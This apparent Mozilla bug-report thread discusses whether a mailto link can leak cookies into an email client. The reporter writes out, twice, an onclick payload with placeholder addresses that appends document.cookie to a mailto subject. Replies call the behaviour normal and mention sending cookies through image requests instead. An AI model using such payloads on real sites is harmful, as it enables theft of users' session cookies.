User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; nl; rv:126.96.36.199) Gecko/20100625 Firefox/3.6.6 Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 6.1; nl; rv:188.8.131.52) Gecko/20100625 Firefox/3.6.6 <a href="mailto:email@example.com" onclick="this.href='mailto:firstname.lastname@example.org?subject=contact '+document.cookie">Bug</a> I can mail the content of the cookies Reproducible: Always Steps to Reproduce: 1. <a href="mailto:email@example.com" onclick="this.href='mailto:firstname.lastname@example.org?subject=contact '+document.cookie">Bug</a> 2. Click on it and you can choose which mail client you want to use, choose Thunderbird 3. See the value of the document.cookie in your subject field. Actual Results: The value of the clients cookies in the subject field, or wherever you chose to receive them in Expected Results: Show the literal string in the subject field With the cookies mailed to yourself you could possibly authenticate yourself as an admin. Version information: Thunderbird: Mozilla/5.0 (Windows; U; Windows NT 6.1; nl; rv:184.108.40.206) Gecko/20100512 Lightning/1.0b1 Thunderbird/3.0.5 Firefox: Mozilla/5.0 (Windows; U; Windows NT 6.1; nl; rv:220.127.116.11) Gecko/20100625 Firefox/3.6.6
How is this a problem? If you have access to document.cookie you could just send it as an HTTP request, or embed it in an image URL, or any number of other things. I don't see how this is a bug at all.
This is just how the web works, in all browsers. If an attacker can inject an on* handler they win. Here's a cheat-sheet for potential xss vectors that sites must filter out of user-supplied content, or given the variety of ways to evade filters better to reject everything except a known-safe subset. http://ha.ckers.org/xss.html mailto: is not a very promising ex-filtration technique -- mail clients will not automatically send the mail so the user has the chance to notice the extra content, or simply cancel the mail if it was a surprise. But it's trivial to change your code to use something else such as an embedded image.
I completely agree, that you need an xss bug or something like that and that you could do whatever you want if you have access to document.cookie. But it is a bit sloppy, I tested the same thing on chrome and internet explorer and both handle it well. They block it, but owkey if you have access to document.cookie you would probably do something else, like adding it in an image request. I wouldn't expect it to happen that's all.